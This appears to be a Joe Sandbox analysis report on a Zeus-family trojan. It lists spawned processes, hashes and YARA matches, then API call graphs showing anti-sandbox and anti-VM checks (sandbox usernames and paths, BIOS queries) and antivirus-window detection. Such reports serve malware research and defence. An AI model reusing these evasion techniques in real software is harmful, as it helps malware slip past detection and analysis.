                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:02:59:17
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:02:59:17
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:02:59:18
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

Target ID:19
Start time:02:59:19
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:21
Start time:02:59:19
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:23
Start time:02:59:19
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:25
Start time:02:59:20
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:27
Start time:02:59:20
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:29
Start time:02:59:20
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:31
Start time:02:59:21
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:33
Start time:02:59:21
Start date:08/09/2024
Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
Imagebase:0x590000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:02:59:21
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:02:59:22
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:02:59:22
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.6%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:62.9%
                                                                                                                                                                                                              Total number of Nodes:259
                                                                                                                                                                                                              Total number of Limit Nodes:11

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$Pnv$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-3115938722
                                                                                                                                                                                                              • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 129 403a20-403a68 RegOpenKeyExA 130 403a6a-403a8d RegQueryValueExA 129->130 131 403acd-403b05 GetUserNameA CharUpperA strstr 129->131 134 403a9b-403aac RegCloseKey 130->134 135 403a8f-403a99 RegCloseKey 130->135 132 403beb 131->132 133 403b0b-403b1e strstr 131->133 137 403bec-403bf2 132->137 133->132 136 403b24-403b37 strstr 133->136 134->131 138 403aae-403ab5 134->138 135->131 136->132 139 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 136->139 138->131 140 403ab7-403abe 138->140 139->132 141 403b7d-403b82 139->141 140->131 142 403ac0-403ac7 140->142 141->132 143 403b84-403b89 141->143 142->131 142->137 143->132 144 403b8b-403b90 143->144 144->132 145 403b92-403b97 144->145 145->132 146 403b99-403bc3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403bc5-403bd5 StrStrIA 146->147 147->132 148 403bd7-403be7 StrStrIA 147->148 148->132 149 403be9 148->149 149->132
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 150 4021d0-40231e CreateFileA 151 402350-402355 150->151 152 402320-40234a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55

                                                                                                                                                                                                              Control-flow Graph

